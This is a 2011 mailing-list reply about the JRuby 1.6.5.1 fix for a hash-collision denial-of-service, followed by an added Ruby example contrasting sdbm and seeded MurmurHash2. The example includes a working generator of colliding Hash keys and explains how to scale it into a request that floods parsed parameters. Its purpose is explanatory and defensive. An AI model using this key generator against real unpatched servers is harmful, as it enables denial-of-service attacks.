(2011/12/29 11:44), botp wrote:
> On Wed, Dec 28, 2011 at 7:51 AM, Thomas E Enebo <tom.enebo / gmail.com> wrote:
>>> JRuby 1.6.5.1 is a special release with a single patch applied to our
>>> JRuby 1.6.5 source to correct CERT vulnerability CERT-2011-003
>>> (http://www.ocert.org/advisories/ocert-2011-003.html).  All users are
>>> recommended to upgrade to JRuby 1.6.5.1 to get this security fix.
>
> if I run (the older) jruby with the -1.9 option, would I still be affected?

Yes, jruby <= 1.6.5 uses sdbm Hash (good old CRuby 1.8's hash function)
both in 1.8/1.9 mode.  Please upgrade to 1.6.5.1 which uses MurmurHash2
like CRuby 1.9 (both in 1.8/1.9).

If you can't upgrade, try to apply the patch for the jruby 1.6 series[1].
If you can't apply the patch, you might be able to get help from the
latest Rack release[2].  If you're using WEBrick for production by
accident, here's an experimental patch[3].

[1] https://github.com/jruby/jruby/compare/9dcd3885...2f607d21
[2] https://groups.google.com/forum/#!topic/rack-devel/Gk74wz5GH_4
[3] https://github.com/nahi/webrick/compare/0daf82f1...ruby_1_8_7

Best regards,
// NaHi


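
The following is an added example, written for this page; it is not code from the thread above, from JRuby, or from CRuby. It shows the point NaHi makes about the two hash functions: an unseeded multiplicative string hash of the sdbm kind (the CRuby 1.8 / JRuby <= 1.6.5 function) lets an attacker precompute arbitrarily many colliding Hash keys offline once, whereas a seeded hash such as MurmurHash2 (CRuby 1.9 / JRuby 1.6.5.1) maps the same keys to different buckets in every process, so the precomputed set is useless. The sdbm multiplier 65599 and the final key + (key >> 5) mix are reproduced from memory of CRuby 1.8's rb_str_hash and are an assumption; the collision construction only relies on the key * M + c recurrence. The alphabet, the function names and the fixed PRNG seed are arbitrary choices for the demo.

```ruby
# Added example, not code from the mailing-list thread or from JRuby/CRuby.
# It shows why an unseeded multiplicative string hash (the sdbm-style hash
# of CRuby 1.8 / JRuby <= 1.6.5) lets an attacker precompute arbitrarily
# many colliding Hash keys offline, and why a per-process random seed (as
# with the MurmurHash2 of CRuby 1.9 / JRuby 1.6.5.1) defeats that work.

MASK32 = 0xffff_ffff
ALPHABET = ('a'..'z').to_a + ('0'..'9').to_a   # key alphabet (arbitrary choice)

# Running state of the sdbm-style loop: key = key * 65599 + byte (mod 2**32).
# Assumption: the multiplier and the final key + (key >> 5) mix below are
# reproduced from memory of CRuby 1.8's rb_str_hash; the attack only relies
# on the key * M + c recurrence, not on the exact constants.
def sdbm_state(str)
  str.each_byte.inject(0) { |key, c| (key * 65599 + c) & MASK32 }
end

def sdbm_hash(str)
  key = sdbm_state(str)
  (key + (key >> 5)) & MASK32
end

# 32-bit MurmurHash2 (Austin Appleby's reference algorithm), transcribed here.
# The seed is mixed into the state first, so every process that picks a fresh
# seed maps the same key to a different bucket.
def murmur2(str, seed)
  m = 0x5bd1e995
  bytes = str.bytes
  h = (seed ^ bytes.size) & MASK32
  bytes.each_slice(4) do |chunk|
    if chunk.size == 4
      k = chunk[0] | (chunk[1] << 8) | (chunk[2] << 16) | (chunk[3] << 24)
      k = (k * m) & MASK32
      k ^= k >> 24
      k = (k * m) & MASK32
      h = ((h * m) & MASK32) ^ k
    else
      # tail of 1..3 bytes, same fall-through order as the C switch
      h ^= chunk[2] << 16 if chunk.size == 3
      h ^= chunk[1] << 8  if chunk.size >= 2
      h ^= chunk[0]
      h = (h * m) & MASK32
    end
  end
  h ^= h >> 13
  h = (h * m) & MASK32
  h ^ (h >> 15)
end

# Birthday search for +count+ pairs of distinct length-+len+ strings with the
# same sdbm state. About sqrt(2 * count * 2**32) random draws are needed
# (roughly 2**17 for four pairs), which is cheap and, because nothing is
# seeded, needs to be done only once for every server running that hash.
def find_sdbm_pairs(count, len, rng)
  seen = {}
  pairs = []
  while pairs.size < count
    s = Array.new(len) { ALPHABET[rng.rand(ALPHABET.size)] }.join
    st = sdbm_state(s)
    other = seen[st]
    if other.nil?
      seen[st] = s
    elsif other != s            # a repeated draw is not a collision
      pairs << [other, s]
      seen.delete(st)
    end
  end
  pairs
end

# The recurrence is linear in each fixed-length block: if a and b have the same
# length and state, then state(p + a + q) == state(p + b + q) for any p, q.
# Choosing one member of each pair and concatenating therefore turns k pairs
# into 2**k keys that all land in one Hash bucket.
def expand_collisions(pairs)
  pairs.inject(['']) do |acc, (a, b)|
    acc.flat_map { |prefix| [prefix + a, prefix + b] }
  end
end

if __FILE__ == $PROGRAM_NAME
  rng = Random.new(2011)                 # fixed seed so the demo is reproducible
  keys = expand_collisions(find_sdbm_pairs(4, 8, rng))
  sdbm = keys.map { |k| sdbm_hash(k) }.uniq.size
  seed = Random.new_seed & MASK32        # what a seeded hash picks per process
  murmur = keys.map { |k| murmur2(k, seed) }.uniq.size
  puts "#{keys.size} keys: #{sdbm} distinct sdbm hash(es), #{murmur} distinct seeded MurmurHash2 values"
end
```

Doubling the number of pairs squares the number of colliding keys, which is why a request body carrying a few tens of thousands of such parameter names is enough to turn every insert into the parsed-params Hash into a linear scan of one bucket; with the seeded hash the same keys spread across buckets and the attacker would have to redo the search per process, without knowing the seed.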